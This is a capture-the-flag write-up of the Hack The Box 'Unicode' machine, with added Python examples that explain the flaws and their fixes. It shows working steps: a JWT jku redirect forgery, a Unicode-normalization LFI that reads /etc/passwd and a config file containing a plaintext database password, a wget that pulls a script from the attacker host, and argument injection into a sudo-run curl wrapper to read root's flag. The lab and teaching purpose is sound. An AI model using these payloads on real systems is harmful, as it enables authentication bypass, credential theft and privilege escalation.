1. IP Address

# Machine Address
10.10.11.126

# Local Address
10.10.14.62

2. Nmap

nmap -sV -sC -oA nmap/unicode 10.10.11.126
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 02:10 EST
Nmap scan report for 10.10.11.126
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fd:a0:f7:93:9e:d3:cc:bd:c2:3c:7f:92:35:70:d7:77 (RSA)
|   256 8b:b6:98:2d:fa:00:e5:e2:9c:8f:af:0f:44:99:03:b1 (ECDSA)
|_  256 c9:89:27:3e:91:cb:51:27:6f:39:89:36:10:41:df:7c (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-generator: Hugo 0.83.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Hackmedia
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.41 seconds

1.2 hosts

Add to /etc/hosts:

10.10.11.126 hackmedia.htb

3. ffuf

ffuf -u http://FUZZ.hackmedia.htb -w /opt/SecLists/Discovery/DNS/dns-Jhaddix.txt -o ffuf/Jhaddix.out
ffuf -u http://hackmedia.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt -c -fs 9294 -t 100

4. JWT

Register, then inspect the request in Burp:

POST /login/ HTTP/1.1
Host: hackmedia.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://hackmedia.htb
DNT: 1
Connection: close
Referer: http://hackmedia.htb/login/
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=ca4mi&password=ca4mi

After signing in:

GET /dashboard/ HTTP/1.1
Host: hackmedia.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://hackmedia.htb/login/
DNT: 1
Connection: close
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy9qd2tzLmpzb24ifQ.eyJ1c2VyIjoiY2E0bWkifQ.nT3ZR5zm6FIbC-0jPxWfJScEYQ_S3WnScSZxZG6G9m4XmUIBeiNdU5ZFt-hrmSUGlVboD2L8ugv_Scs-d-OllwI931tITfKLFOf50T9_3JdKlxkd1ll5QXh_S4SfIf0KPZbRD1ORBxn-DSySPOr0Mg1hdnd4kAQjOOSczNg9J03BqxTeHzfXsWZdM861iQfF4NLQ8FupMNyeMM4wBFGxPKTb_RSmse_Nw7HgkRz83cOsiQBNCnW-1bdX_KL_oV33FuAjnnYTrTTAfVcVb2PZ2REZW36AWpPJTD8WDhwEp_FIQYZMcOB4ivBQf_5PJIqBjG2Q7gCGG1uB1w305Zp0YA
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

flask-unsign command:

pip3 install flask-unsign

Decode the cookie (reference: https://book.hacktricks.xyz/pentesting/pentesting-web/flask):

flask-unsign -c eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy9qd2tzLmpzb24ifQ.eyJ1c2VyIjoiY2E0bWkifQ.nT3ZR5zm6FIbC-0jPxWfJScEYQ_S3WnScSZxZG6G9m4XmUIBeiNdU5ZFt-hrmSUGlVboD2L8ugv_Scs-d-OllwI931tITfKLFOf50T9_3JdKlxkd1ll5QXh_S4SfIf0KPZbRD1ORBxn-DSySPOr0Mg1hdnd4kAQjOOSczNg9J03BqxTeHzfXsWZdM861iQfF4NLQ8FupMNyeMM4wBFGxPKTb_RSmse_Nw7HgkRz83cOsiQBNCnW-1bdX_KL_oV33FuAjnnYTrTTAfVcVb2PZ2REZW36AWpPJTD8WDhwEp_FIQYZMcOB4ivBQf_5PJIqBjG2Q7gCGG1uB1w305Zp0YA -d

Result (the decoded header):

{'typ': 'JWT', 'alg': 'RS256', 'jku': 'http://hackmedia.htb/static/jwks.json'}

The key set served at /static/jwks.json:

{
    "keys": [
        {
            "kty": "RSA",
            "use": "sig",
            "kid": "hackthebox",
            "alg": "RS256",
            "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
            "e": "AQAB"
        }
    ]
}

JSON Web Key Set (JWKS): A JSON object that represents a set of JWKs. The JSON object MUST have a "keys" member, which is an array of JWKs.

[6.3.1.1](https://datatracker.ietf.org/doc/html/rfc7518#section-6.3.1.1).  "n" (Modulus) Parameter

   The "n" (modulus) parameter contains the modulus value for the RSA
   public key.  It is represented as a Base64urlUInt-encoded value.

   Note that implementers have found that some cryptographic libraries
   prefix an extra zero-valued octet to the modulus representations they
   return, for instance, returning 257 octets for a 2048-bit key, rather
   than 256.  Implementations using such libraries will need to take
   care to omit the extra octet from the base64url-encoded
   representation.

[6.3.1.2](https://datatracker.ietf.org/doc/html/rfc7518#section-6.3.1.2).  "e" (Exponent) Parameter

   The "e" (exponent) parameter contains the exponent value for the RSA
   public key.  It is represented as a Base64urlUInt-encoded value.

   For instance, when representing the value 65537, the octet sequence
   to be base64url-encoded MUST consist of the three octets [1, 0, 1];
   the resulting representation for this value is "AQAB".
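Added example (mine, not from the writeup) applying the two RFC sections above to the key set served at /static/jwks.json: "AQAB" decodes to 65537, and the published "n" is exactly the case the note describes, 257 octets with a zero-valued octet prefixed to a 2048-bit modulus; the helpers also produce the minimal encoding a strict verifier would expect.

```python
import base64

# Key material copied from the target's /static/jwks.json shown above.
JWKS_N = "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs"
JWKS_E = "AQAB"


def b64url_decode(s: str) -> bytes:
    """Unpadded base64url, as used throughout JOSE."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_uint_decode(s: str, strict: bool = False) -> int:
    """RFC 7518 Base64urlUInt: big-endian unsigned integer in the minimum
    number of octets. With strict=True the extra leading zero octet that some
    libraries emit (257 octets for a 2048-bit key) is rejected."""
    raw = b64url_decode(s)
    if strict and len(raw) > 1 and raw[0] == 0:
        raise ValueError("non-minimal Base64urlUInt: extra leading zero octet")
    return int.from_bytes(raw, "big")


def b64url_uint_encode(value: int) -> str:
    """Encode with the minimum number of octets (65537 -> [1, 0, 1] -> 'AQAB')."""
    length = max(1, (value.bit_length() + 7) // 8)
    return base64.urlsafe_b64encode(value.to_bytes(length, "big")).rstrip(b"=").decode()


def inspect_modulus(n_b64: str) -> dict:
    """Report the octet count, whether a zero octet was prefixed, the key size
    in bits, and the canonical (minimal) encoding of the same modulus."""
    raw = b64url_decode(n_b64)
    n = int.from_bytes(raw, "big")
    return {
        "octets": len(raw),
        "leading_zero": raw[0] == 0,
        "bits": n.bit_length(),
        "canonical": b64url_uint_encode(n),
    }
```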

Generate a random key set at https://mkjwk.org. Copy the "n" from the Public Key section together with the public and private key PEMs.

Paste the new user's cookie into http://jwt.io, select RS256, and set in the payload and header:

role: admin, jku: http://hackmedia.htb/static/../redirect/?url=<local_ip:8000/jwks.json>

Paste the public and private key PEMs obtained from https://mkjwk.org into the corresponding signature fields below the token.

Start a local server to host the generated jwks.json:

python -m http.server

Sign in to http://hackmedia.htb and replace the cookie with the one crafted at http://jwt.io. The target fetches the key set from the local server:

10.10.11.126 - - [29/Dec/2021 01:31:21] "GET /jwks.json HTTP/1.1" 200 -
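The jku value above gets past a prefix-based allowlist: textually the URL stays under /static/, but the "../" segment plus the open redirect sends the key fetch somewhere else. Added example (not the application's code) that reads the jku out of the cookie header segment shown earlier and contrasts the weak prefix check with a strict one that normalizes the URL and accepts only the pinned JWKS location.

```python
import base64
import json
import posixpath
from urllib.parse import urlsplit

# Header segment (first dot-separated part) of the auth cookie captured above.
TOKEN_HEADER = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy9qd2tzLmpzb24ifQ"

# Where the application really publishes its keys, and the jku value used on
# the page to make the server fetch a key set from elsewhere.
TRUSTED_JWKS_URL = "http://hackmedia.htb/static/jwks.json"
TRAVERSAL_JKU = "http://hackmedia.htb/static/../redirect/?url=<local_ip:8000/jwks.json>"


def jku_from_header(header_b64: str) -> str:
    """Read the jku parameter from a raw, not yet verified JWT header segment."""
    raw = base64.urlsafe_b64decode(header_b64 + "=" * (-len(header_b64) % 4))
    return json.loads(raw)["jku"]


def weak_jku_check(jku: str) -> bool:
    """Prefix allowlist: '..' segments and a redirect query string both pass it."""
    return jku.startswith("http://hackmedia.htb/static/")


def strict_jku_check(jku: str) -> bool:
    """Accept only the pinned JWKS URL: same scheme and host, no query or
    fragment, no dot segments, normalized path identical to the trusted one."""
    trusted, parts = urlsplit(TRUSTED_JWKS_URL), urlsplit(jku)
    if (parts.scheme, parts.netloc) != (trusted.scheme, trusted.netloc):
        return False
    if parts.query or parts.fragment:
        return False
    if any(seg in (".", "..") for seg in parts.path.split("/")):
        return False
    return posixpath.normpath(parts.path) == trusted.path


def jwks_source_for(header_b64: str) -> str:
    """Server-side decision: a token whose jku fails the strict check is
    rejected before any key fetch or signature check happens."""
    return TRUSTED_JWKS_URL if strict_jku_check(jku_from_header(header_b64)) else "REJECT"
```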

5. LFI filter

/display/?page=XXXX
GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
code:x:1000:1000:,,,:/home/code:/bin/bash
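Why %EF%B8%B0 gets past the filter, as an added example (not the box's code): it is UTF-8 for U+FE30, which NFKC normalization turns into "..", so a check for ".." on the raw input passes and normalization afterwards recreates the traversal. The template root is an assumed path; the fix shown is to canonicalize first and then verify that the resolved path stays under the root.

```python
import posixpath
import unicodedata
from urllib.parse import unquote

# Assumed template directory of the Flask app (hypothetical, not known from the page).
WEBROOT = "/home/code/coder/templates"

# The page parameter used above: %EF%B8%B0 is the UTF-8 encoding of U+FE30.
PAYLOAD = "%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd"


def normalized(page_param: str) -> str:
    """URL-decode, then apply the NFKC normalization the bypass relies on."""
    return unicodedata.normalize("NFKC", unquote(page_param))


def vulnerable_resolve(page_param: str) -> str:
    """Filter-then-normalize: the '..' check runs on the raw string, where
    U+FE30 is not '..', and normalization afterwards recreates the dot segments."""
    page = unquote(page_param)
    if ".." in page:
        raise ValueError("traversal blocked")
    page = unicodedata.normalize("NFKC", page)
    return posixpath.normpath(posixpath.join(WEBROOT, page))


def safe_resolve(page_param: str) -> str:
    """Canonicalize first, then require the resolved path to remain under
    WEBROOT instead of pattern-matching the input."""
    target = posixpath.normpath(posixpath.join(WEBROOT, normalized(page_param)))
    if posixpath.commonpath([WEBROOT, target]) != WEBROOT:
        raise ValueError("traversal blocked")
    return target
```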

Checking which user the web process runs as:

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/proc/self/environ
LANG=en_US.UTF-8
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
LOGNAME=codeUSER=codeSHELL=/bin/bash
INVOCATION_ID=b2a1c9ff17bd49e2bf01d83a1cf7ce1b

USER is code, so user.txt can be read the same way:

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/user.txt 

user.txt

743e4e*********

Trying to grab the SSH key does not work. I intend to reset the machine and try again:

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/.ssh/id_rsa 

It did not work.

/etc/nginx/sites-enabled/default:

limit_req_zone $binary_remote_addr zone=mylimit:10m rate=800r/s;

server{
    #Change the Webroot from /home/code/app/ to /var/www/html/
    #change the user password from db.yaml
    listen 80;
    error_page 503 /rate-limited/;
    location / {
        limit_req zone=mylimit;
        proxy_pass http://localhost:8000;
        include /etc/nginx/proxy_params;
        proxy_redirect off;
    }
    location /static/{
        alias /home/code/coder/static/styles/;
    }
}

The comment points at db.yaml:

GET /display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/coder/db.yaml
mysql_host: "localhost"
mysql_user: "code"
mysql_password: "B3stC0d3r2021@@!"
mysql_db: "user"

Log in over SSH with that password:

ssh code@10.10.11.126

sudo -l:

User code may run the following commands on code:
    (root) NOPASSWD: /usr/bin/treport

6. Privilege Escalation

tool: https://github.com/diego-treitos/linux-smart-enumeration

python3 -m http.server           # on the attacking host; serves lse.sh on port 8000
wget 10.10.14.5:8000/lse.sh      # on the target
chmod +x lse.sh
./lse.sh
sudo /usr/bin/treport

1.Create Threat Report.
2.Read Threat Report.
3.Download A Threat Report.
4.Quit.

Enter your choice:3

Enter the IP/file_name:{-K,/root/root.txt}

Warning: /root/root.txt:1: warning: '517*****************' is 
Warning: unknown
curl: no URL specified!

root.txt:

517*****************